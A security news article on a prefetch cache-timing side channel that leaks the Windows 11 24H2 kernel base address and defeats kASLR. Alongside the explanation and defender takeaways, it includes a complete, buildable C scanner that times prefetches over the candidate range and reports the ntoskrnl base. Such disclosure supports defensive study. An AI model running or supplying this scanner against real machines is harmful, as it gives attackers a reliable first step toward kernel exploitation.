A newly demonstrated side-channel attack shows that Kernel Address Space Layout Randomization (kASLR) in Windows 11, including the latest 24H2 release, can be defeated with cache timing techniques.
The attack leverages microarchitectural behaviour, specifically speculative execution and the CPU cache hierarchy, to infer the base address of ntoskrnl.exe from an unprivileged process, sidestepping the protection that kASLR is meant to provide.
Erosion of Traditional kASLR Bypass Methods
Historically, attackers and researchers have relied on Windows APIs such as NtQuerySystemInformation() (with the SystemModuleInformation class) to retrieve kernel image locations, but Microsoft's changes in Windows 11 24H2 have closed this loophole: system module addresses can no longer be queried without elevated privileges.
However, a new approach, disclosed by exploits-forsale and covered in recent technical reporting, shows that these defensive changes are not sufficient once microarchitectural side channels are brought to bear.
Modern processors optimize performance using features like speculative execution, which predicts and executes likely instruction paths, and multi-level cache hierarchies that store frequently accessed data closer to the CPU.
While these features enhance speed, they also expose subtle timing variations that attackers can measure to glean protected information.
The Prefetch Side-Channel technique exploits this by systematically probing every possible kernel base address between 0xfffff80000000000 and 0xfffff80800000000, stepping at the 0x100000 alignment, which yields 0x8000 candidates.

The attacker repeatedly touches each candidate address with a custom assembly routine that combines precise timing instructions (rdtscp, mfence, lfence) with the cache-hint instructions prefetchnta and prefetcht2.
By measuring the prefetch latency for each address, the attack picks out those whose prefetch completes quickly, the signature of a virtual address that has a valid translation and is resident in cache, in other words memory backing an active system module, here ntoskrnl.exe. Higher latency marks unmapped slots; the lowest latencies cluster on addresses the kernel itself has touched most recently or most frequently.
Attack Implementation
The proof of concept is a well-documented C and assembly hybrid. The attack routine, named sideChannel, flushes and reloads each candidate address, measuring the elapsed CPU cycles around the cache prefetches.

These timings are aggregated across multiple iterations to filter noise and outliers.
The program then analyzes the statistical distribution of the timings, looking for a consistent cluster of minimal-latency accesses, which correlates strongly with the actual loaded base of ntoskrnl.exe.
This method does not require SeDebugPrivilege, admin rights, or API calls restricted by Windows security settings.
Notably, the attack works reliably on bare-metal systems with Intel CPUs, whereas virtualized environments (such as VMware with SLAT) may disrupt it, since nested paging changes address translation and therefore the timing signal.
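The probe loop, timing primitive and clustering step described above, written out as an added example in C. This is not the exploits-forsale proof of concept and not its sideChannel routine; the function names (time_prefetch, scan_minimums, pick_threshold, find_fast_cluster), the per-slot-minimum aggregation and the midpoint threshold heuristic are this example's own choices. It uses GCC/Clang x86 intrinsics for rdtscp, the fences and the prefetch hints, and compiles the timing path only on x86-64 hosts.

```c
/* prefetch_scan.c: added example, not the original proof of concept. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#if defined(__x86_64__)
#include <x86intrin.h>   /* __rdtscp, _mm_prefetch, _mm_mfence, _mm_lfence */
#define HAVE_X86_TIMING 1
#else
#define HAVE_X86_TIMING 0 /* build-only fallback on non-x86 hosts */
#endif

/* Candidate range from the article: 0x8000 slots, 1 MiB apart. */
#define SCAN_START 0xfffff80000000000ULL
#define SCAN_END   0xfffff80800000000ULL
#define SCAN_STEP  0x100000ULL
#define NUM_CANDIDATES ((size_t)((SCAN_END - SCAN_START) / SCAN_STEP))

/* Cycles for one prefetcht2 + prefetchnta pair on `addr`. Prefetch hints
 * never fault, so user mode can probe kernel addresses freely; the fences
 * stop out-of-order execution from leaking work across the rdtscp reads. */
static uint64_t time_prefetch(uintptr_t addr)
{
#if HAVE_X86_TIMING
    unsigned int aux;
    const char *p = (const char *)addr;
    _mm_mfence(); _mm_lfence();
    uint64_t t0 = __rdtscp(&aux);
    _mm_lfence();
    _mm_prefetch(p, _MM_HINT_T2);
    _mm_prefetch(p, _MM_HINT_NTA);
    _mm_mfence(); _mm_lfence();
    uint64_t t1 = __rdtscp(&aux);
    _mm_lfence();
    return t1 - t0;
#else
    (void)addr;
    return 0;
#endif
}

/* Probe every slot `iters` times, keeping the per-slot minimum: interrupts
 * and context switches only ever add latency, so the minimum is the
 * cleanest estimate of the true cost. */
static void scan_minimums(uint64_t *mins, size_t n, unsigned iters)
{
    for (size_t i = 0; i < n; i++) mins[i] = UINT64_MAX;
    for (unsigned it = 0; it < iters; it++)
        for (size_t i = 0; i < n; i++) {
            uint64_t t = time_prefetch((uintptr_t)(SCAN_START + i * SCAN_STEP));
            if (t < mins[i]) mins[i] = t;
        }
}

static int cmp_u64(const void *a, const void *b)
{
    uint64_t x = *(const uint64_t *)a, y = *(const uint64_t *)b;
    return (x > y) - (x < y);
}

/* Data-driven threshold (heuristic chosen for this example): halfway
 * between the fastest slot and the median, so no absolute cycle count,
 * which differs per CPU model, has to be hard-coded. */
static uint64_t pick_threshold(const uint64_t *mins, size_t n)
{
    if (n == 0) return 0;
    uint64_t *sorted = malloc(n * sizeof *sorted);
    if (!sorted) return 0;
    memcpy(sorted, mins, n * sizeof *sorted);
    qsort(sorted, n, sizeof *sorted, cmp_u64);
    uint64_t lo = sorted[0], med = sorted[n / 2];
    free(sorted);
    return lo + (med - lo) / 2;
}

/* Index of the longest run of consecutive slots below `threshold`, or -1
 * if no run reaches `min_run`. A loaded kernel image spans many MiB, so a
 * lone fast slot (stray cached line, timing glitch) is rejected. */
static long find_fast_cluster(const uint64_t *mins, size_t n,
                              uint64_t threshold, size_t min_run)
{
    long best_start = -1;
    size_t best_len = 0, run_start = 0, run_len = 0;
    for (size_t i = 0; i < n; i++) {
        if (mins[i] < threshold) {
            if (run_len == 0) run_start = i;
            if (++run_len > best_len) { best_len = run_len; best_start = (long)run_start; }
        } else {
            run_len = 0;
        }
    }
    return best_len >= min_run ? best_start : -1;
}

static uint64_t candidate_address(long idx)
{
    return SCAN_START + (uint64_t)idx * SCAN_STEP;
}

int main(void)
{
    uint64_t *mins = malloc(NUM_CANDIDATES * sizeof *mins);
    if (!mins) return 1;
    scan_minimums(mins, NUM_CANDIDATES, 64);
    uint64_t thr = pick_threshold(mins, NUM_CANDIDATES);
    long idx = find_fast_cluster(mins, NUM_CANDIDATES, thr, 4);
    if (idx < 0)
        printf("no fast cluster (threshold %llu cycles)\n", (unsigned long long)thr);
    else
        printf("fast cluster starts at 0x%016llx (threshold %llu cycles)\n",
               (unsigned long long)candidate_address(idx), (unsigned long long)thr);
    free(mins);
    return 0;
}
```

Build with `gcc -O2 prefetch_scan.c -o prefetch_scan`. The probe is read-only and never dereferences a kernel address, so it cannot crash the process. Expect a usable signal only on bare-metal x86 hosts: under a hypervisor with nested paging the timing separation shrinks, and on a Linux host with KPTI the kernel is not mapped in user page tables at all, so the scan reports no cluster there; the article's target is Windows, which keeps ntoskrnl.exe mapped in every process.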

According to the report, the successful bypass of kASLR via this microarchitectural attack underlines the persistent risks presented by speculative execution and side-channel vulnerabilities, issues that have troubled the hardware industry since Spectre and Meltdown.
While Intel and other vendors have rolled out mitigations at both firmware and OS levels, cache timing attacks remain challenging to completely eradicate without significant performance trade-offs.
For defenders, this research highlights the necessity of hardware-software co-design and the limits of software-only address randomization for kernel protection.
It also calls for ongoing scrutiny of microarchitectural behavior and for robust monitoring of abnormal timing patterns that could signal exploitation attempts.
In summary, the Prefetch Side-Channel attack shows that kASLR, against a determined adversary armed with knowledge of CPU internals, cannot be treated as a silver bullet against kernel address disclosure on modern Windows platforms.